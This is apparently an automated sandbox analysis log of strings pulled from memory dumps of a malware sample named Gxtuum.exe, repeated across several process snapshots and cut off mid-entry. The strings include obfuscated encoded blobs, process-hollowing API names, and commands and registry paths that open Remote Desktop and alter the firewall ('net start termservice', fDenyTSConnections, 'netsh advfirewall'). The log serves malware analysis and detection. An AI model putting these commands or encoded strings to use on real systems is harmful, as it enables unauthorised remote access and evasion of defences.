Source: Gxtuum.exe, 00000009.00000000.1959547793.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 0000000C.00000002.2561822917.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000C.00000002.2561822917.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 0000000C.00000000.2559783171.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000C.00000000.2559783171.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 0000000D.00000002.3163105032.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000D.00000002.3163105032.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 0000000E.00000000.3761151713.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000E.00000000.3761151713.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA 